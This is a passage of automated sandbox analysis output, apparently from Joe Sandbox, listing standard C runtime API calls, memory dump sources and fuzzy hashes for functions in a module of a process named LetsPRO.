                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID: I
                                        • API String ID: 340685940-3707901625
                                        • Opcode ID: 8817d289b547c928b30be3b3da034db11f8edfc80d0f8d5464368a99fa3c570c
                                        • Instruction ID: 5997002b0e431955064efefbb3374968d36e1366fb5d9d067acd8175aa1be9f1
                                        • Opcode Fuzzy Hash: 8817d289b547c928b30be3b3da034db11f8edfc80d0f8d5464368a99fa3c570c
                                        • Instruction Fuzzy Hash: CC01A271C0020ADBDF10DFA6C8006EEBBB5BF4432CF104619E534A62D0E775C215CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C955F2C
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C955F37
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID: I
                                        • API String ID: 340685940-3707901625
                                        • Opcode ID: 5d52eb2c49943ab7de0a7bc407d4c94b4ef1d25a755472f31378af48757148e9
                                        • Instruction ID: 1be9a075aceef3ae39a6548c370e87f68493857e627af6ebe92b42b9b57e401d
                                        • Opcode Fuzzy Hash: 5d52eb2c49943ab7de0a7bc407d4c94b4ef1d25a755472f31378af48757148e9
                                        • Instruction Fuzzy Hash: CB01D171D0020AEBDF10DFA6C804ADEBBB5FF44368F108225F834A6191E775C221CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • DecodePointer.KERNEL32(?,6C90B7A4,6C90C8D8,00000000,00000001), ref: 6C917898
                                        • free.MSVCR100(?), ref: 6C9178BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: DecodePointerfree
                                        • String ID: csm
                                        • API String ID: 2443025543-1018135373
                                        • Opcode ID: 9d1d30bc2e959389d20f39a51ed8a9d4db9fbf8160b4ea03dee5cb0ce5d65f06
                                        • Instruction ID: 210237a1044c82ef3109a6a39bec7b2bf19fed602ba850ca58ddd438cf7cc3f0
                                        • Opcode Fuzzy Hash: 9d1d30bc2e959389d20f39a51ed8a9d4db9fbf8160b4ea03dee5cb0ce5d65f06
                                        • Instruction Fuzzy Hash: C2F0E9306093069BDB308E36D4C195A77FC5F603193340ADCE495D6D90DB20D885C690
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::
                                        • String ID: {flat}
                                        • API String ID: 1333004437-2606204563
                                        • Opcode ID: ae4e0d5161baeab46051a23163389e8372356148b8a24ab7bbeabb9cb0dce86e
                                        • Instruction ID: d81329135e22ff77ee66b44eaf9a82534d9a273d25ebd8a40d9ebaa12bed9865
                                        • Opcode Fuzzy Hash: ae4e0d5161baeab46051a23163389e8372356148b8a24ab7bbeabb9cb0dce86e
                                        • Instruction Fuzzy Hash: EAF0A9312462089FDF64CF98D480BE83BA4AF86B59F048085E44C0FB42C731D841CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • std::exception::exception.LIBCMT(6C93C58C), ref: 6C93C550
                                        • _CxxThrowException.MSVCR100(00010000,6C9A0D0C,6C93C58C), ref: 6C93C565
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ExceptionThrowstd::exception::exception
                                        • String ID: version
                                        • API String ID: 4279132481-3206337475
                                        • Opcode ID: 8cbdfa9fdcd88caa41dd210c8a6a8ba8090e8108d09ba6db9a08975617480ef0
                                        • Instruction ID: 4a25d84669cc3f736edd1f81bfd11914cb20d7147ab39600c2c03ac86743b42b
                                        • Opcode Fuzzy Hash: 8cbdfa9fdcd88caa41dd210c8a6a8ba8090e8108d09ba6db9a08975617480ef0
                                        • Instruction Fuzzy Hash: 29F0307290822CBACB00EF54D442BCD7BB8BB64388F10E215B81E57A50C774D689CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%